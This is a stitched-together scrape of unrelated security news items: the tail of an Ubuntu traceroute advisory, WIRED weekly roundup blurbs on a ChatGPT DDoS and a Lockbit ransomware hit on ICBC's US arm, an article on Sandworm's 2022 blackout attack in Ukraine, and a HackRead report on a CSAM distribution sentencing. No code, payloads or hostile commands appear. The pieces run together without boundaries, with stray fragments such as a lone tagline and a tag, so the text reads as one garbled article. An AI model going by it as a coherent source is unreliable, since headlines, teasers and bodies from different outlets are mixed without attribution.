   traceroute                      1:2.0.21-1ubuntu0.1~esm1

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   traceroute                      1:2.0.20-0ubuntu0.1+esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6478-1  
   CVE-2023-46316

Ubuntu Security Notice USN-6478-1

Netflix, Spotify, Twitter, PayPal, Slack. All down for millions of people. How a group of teen friends plunged into an underworld of cybercrime and broke the internet—then went to work for the FBI.

The Mirai Confessions: Three Young Hackers Who Built a Web-Killing Monster Finally Tell Their Story

Plus: A DDoS attack shuts down ChatGPT, Lockbit shuts down a bank, and a communications breakdown between politicians and Big Tech.

Drones, hidden cameras, thermal vision scopes—these are just a few examples of the high-tech equipment recommended by the animal liberation group Direct Action Everywhere, according to a manual released by the organization this week. The document, which was reviewed by WIRED, is a rare glimpse into how the organization is using tech to target factory farms in often brazen operations that have rescued pigs, goats, ducks, and chickens.

Extremist groups are experimenting with generative AI to flood social media with propaganda and misinformation, researchers at Tech Against Terrorism have told WIRED. A new report from the group details how, in recent months, terrorists and other extremist organizations have been using artificial intelligence to manipulate imagery and thwart content moderation. As platforms have struggled to keep up with this flood of extremist content, a new tool called Altitude, built in collaboration between Tech Against Terrorism and Google, is seeking to address the problem. The tool centralizes the collection of verified terrorist content, allowing companies to easily vet posts shared to their platforms.

Israel is exacerbating the humanitarian catastrophe in Gaza by likely imposing devastating internet blackouts in the region. Last week, Israel reportedly imposed a full internet shutdown in the area as its troops moved into the Gaza Strip. After internet access was restored, the area suffered two additional connectivity blackouts. The most recent lasted for about 15 hours on Sunday as Israel was carrying out an intense operation to cut off Gaza City in the north from southern Gaza.

In other infrastructure news, a report from the ​​cybersecurity firm Mandiant reveals that last year, the Russian military intelligence agency known as Sandworm carried out a power grid attack targeting a Ukrainian electric utility causing a blackout for Ukrainian civilians. According to the report, the cyberattack coincided with the start of a series of missile strikes targeting Ukrainian critical infrastructure across the country.

The third GOP presidential primary debate was livestreamed on Rumble, a YouTube alternative home to what the Southern Poverty Law Center says is one of America’s most notorious white nationalists, Nick Fuentes. Since the outbreak of the Israel-Hamas conflict last month, Fuentes has used his Rumble channel to push antisemitic hate speech and Holocaust denial conspiracies, racking up hundreds of thousands of views. Fuentes’ YouTube account was terminated in 2020 after Google demonetized it.

And there's more. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there

On Wednesday, you and everyone you know had trouble getting ChatGPT to ghostwrite their emails as developer OpenAI was hit by what it thought was a distributed denial-of-service attack. For nearly two hours, users who tried to access the chatbot were greeted with a message telling them “ChatGPT is at capacity right now.”

In a tweet, OpenAI CEO Sam Altman initially blamed its outage on a surge in interest in the platform's new features. By Wednesday night the company announced that the periodic outages were due to an “abnormal traffic pattern reflective of a DDoS attack.”

While it’s unclear who is behind the attack, a group known as Anonymous Sudan claimed responsibility on Wednesday, posting on Telegram that it had targeted OpenAI for "general biases towards Israel and against Palestine." OpenAI has since resolved the issue.

The US arm of the Industrial and Commercial Bank of China was hit by a ransomware attack that disrupted trades in the US Treasury market on Thursday. The bank appears to be the latest victim of the prolific ransomware gang known as Lockbit. According to the US Cybersecurity and Infrastructure Security Agency, Lockbit has hit 1,700 US organizations since 2020 and extorted more than $100 million in ransom demands. Last month it threatened Boeing with a leak of sensitive data.

"ICBC has been closely monitoring the matter and has done its best in emergency response and supervisory communication," China's foreign ministry spokesperson Wang Wenbin said at a press conference.

Signal is beta testing usernames that will allow people to communicate using the encrypted service without exchanging phone numbers, further enhancing the app's privacy applications. The feature will go live in early 2024.

Support for usernames is a major step for the messaging service as Signal has apparently been working on the feature for years. Though accounts will still need to be associated with a phone number at setup, the introduction of usernames will allow users to connect without having to share it.

Cooperation between government, researchers, and tech companies aimed at countering disinformation online is evaporating thanks to a sustained campaign by US Republicans in the press, courts, and on Capitol Hill. Tech employees tell NBC the FBI has halted communications with social media firms about foreign influence campaigns, a move the FBI director attributed to a September ruling in the country's most conservative appellate court forbidding the government from "significantly" encouraging social media companies to remove misinformation.

“We’re having some interaction with social media companies,” FBI director Christopher Wray said in testimony last week to the Senate Homeland Security Committee. “But all of those interactions have changed fundamentally in the wake of the court rulings.”

According to NBC, all the FBI’s interactions with tech platforms now have to be supervised by Justice Department lawyers.

Signal Is Finally Testing Usernames

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 3 and Nov. 10. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for November 3 to November 10

Russia's most notorious military hackers successfully sabotaged Ukraine's power grid for the third time last year. And in this case, the blackout coincided with a physical attack.

The notorious unit of Russia's GRU military intelligence agency known as Sandworm remains the only team of hackers to have ever triggered blackouts with their cyberattacks, turning off the lights for hundreds of thousands of Ukrainian civilians not once, but twice within the past decade. Now it appears that in the midst of Russia's full-scale war in Ukraine, the group has achieved another dubious distinction in the history of cyberwar: It targeted civilians with a blackout attack at the same time missile strikes hit their city, an unprecedented and brutal combination of digital and physical warfare.

Cybersecurity firm Mandiant today revealed that Sandworm, a cybersecurity industry name for Unit 74455 of Russia's GRU spy agency, carried out a third successful power grid attack targeting a Ukrainian electric utility in October of last year, causing a blackout for an unknown number of Ukrainian civilians. In this case, unlike any previous hacker-induced blackouts, Mandiant says the cyberattack coincided with the start of a series of missile strikes targeting Ukrainian critical infrastructure across the country, which included victims in the same city as the utility where Sandworm triggered its power outage. Two days after the blackout, the hackers also used a piece of data-destroying "wiper" malware to erase the contents of computers across the utility's network, perhaps in an attempt to destroy evidence that could be used to analyze their intrusion.

Mandiant, which has worked closely with the Ukrainian government on digital defense and investigations of network breaches since the start of the Russian invasion in February of 2022, declined to name the targeted electric utility or the city where it was located. Nor would it offer information like the length of the resulting power loss or the number of civilians affected.

Mandiant does note in its report on the incident that as early as two weeks before the blackout, Sandworm's hackers appear to have already possessed all the access and capabilities necessary to hijack the industrial control system software that oversees the flow of power at the utility's electrical substations. Yet it appears to have waited to carry out the cyberattack until the day of Russia's missile strikes. While that timing may be coincidental, it more likely suggests coordinated cyber and physical attacks, perhaps designed to sow chaos ahead of those air strikes, complicate any defense against them, or add to their psychological effect on civilians.

"The cyber incident exacerbates the impact of the physical attack," says John Hultquist, Mandiant's head of threat intelligence, who has tracked Sandworm for nearly a decade and named the group in 2014. "Without seeing their actual orders, it's really hard on our side to make a determination of whether or not that was on purpose. I will say that this was carried out by a military actor and coincided with another military attack. If it was a coincidence, it was a terribly interesting coincidence."

Nimbler, Stealthier Cybersaboteurs

The Ukrainian government's cybersecurity agency, SSSCIP, declined to fully confirm Mandiant's findings in response to a request from WIRED, but it didn't dispute them. SSSCIP's deputy chair, Viktor Zhora, wrote in a statement that the agency responded to the breach last year, working with the victim to "minimize and localize the impact." In an investigation over the two days following the near-simultaneous blackout and missile strikes, he says, the agency confirmed that the hackers had found a "bridge" from the utility's IT network to its industrial control systems and planted malware there capable of manipulating the grid.

Mandiant's more detailed breakdown of the intrusion shows how the GRU's grid hacking has evolved over time to become far more stealthy and nimble. In this latest blackout attack, the group used a "living off the land" approach that has become more common among state-sponsored hackers seeking to avoid detection. Instead of deploying their own custom malware, they exploited the legitimate tools already present on the network to spread from machine to machine before finally running an automated script that used their access to the facility's industrial control system software, known as MicroSCADA, to cause the blackout.

In Sandworm's 2017 blackout that hit a transmission station north of the capital of Kyiv, by contrast, the hackers used a custom-built piece of malware known as Crash Override or Industroyer, capable of automatically sending commands over several protocols to open circuit-breakers. In another Sandworm power grid attack in 2022, which the Ukrainian government has described as a failed attempt to trigger a blackout, the group used a newer version of that malware known as Industroyer2.

Sandworm Hackers Caused Another Blackout in Ukraine—During a Missile Strike

By Waqas
You reap what you sow!
This is a post from HackRead.com Read the original post: US Man Sentenced to Over 21 Years for Dark Web Distribution of CSAM

In April 2023, Austen Peppers from Lawton, Oklahoma, pleaded guilty to advertising and distributing child sexual abuse material (CSAM) on the dark web.

Austen Peppers, a 36-year-old resident of Lawton, Oklahoma, faced the gavel and received a sentencing of 21 years and 10 months in prison, followed by 15 years of supervised release. This judgment came after Peppers was **found guilty** in April 2023, of the advertising and distribution of child sexual abuse material (CSAM) on the dark web, as announced by U.S. Attorney Phillip A. Talbert.

The distribution of CSAM has emerged as a significant challenge for law enforcement, exacerbated by AI services capable of generating harmful images. Recently, the Internet Watch Foundation, a UK-based internet watchdog, **revealed that** cybercriminals are turning to generative AI platforms to create child sexual abuse material (CSAM).

The court documents unveiled a disturbing timeline spanning from March 2018 to August 2019, during which Peppers was involved in the sale and solicitation of images portraying minors subjected to sexual abuse. His transactions were executed in the shadows of the **dark web**, employing cryptocurrency, and utilizing platforms that he believed shielded him from law enforcement scrutiny.

Peppers also engaged in explicit conversations with individuals he believed were minors, persuading them to create sexually explicit self-images. Shockingly, Peppers accumulated an extensive library of thousands of images and videos depicting children suffering sexual abuse.

According to a **press release** from the US Department of Justice (DoJ),, Austen Peppers has been in confinement since his initial appearance in court on November 14, 2019. As part of the sentencing, Peppers was also directed to pay restitution of $57,000 to 19 victims who suffered due to his vile actions.

This case highlights the dangers posed by individuals utilizing the anonymity of the dark web for criminal activities, especially those exploiting and abusing minors. Engaging in illegal activities, particularly heinous crimes such as the distribution of CSAM, on the dark web is a serious offence that should be strictly avoided.

Hackread.com has consistently cautioned users about the dangerous nature of the illicit sections of the dark web, emphasizing the importance of refraining from engaging in unlawful actions while navigating its depths. To gain a deeper understanding of the potential risks and the activities that should be avoided on the dark web, you can explore further details **here**.

****_RELATED ARTICLES_****

1.  Dark Web’s worst pedophile sentenced to 32 years in prison
2.  NHS Psychiatrist Jailed; Dark Web Forum and 7,000 Images Seized
3.  Creators of dark web chat room arrested for facilitating child abuse
4.  210 days prison for crypto CEO who held 13k child abuse, beastiality files
5.  School Principal Gets 9 Years in Prison for Trading Nude Pictures of Students

Tag

#acer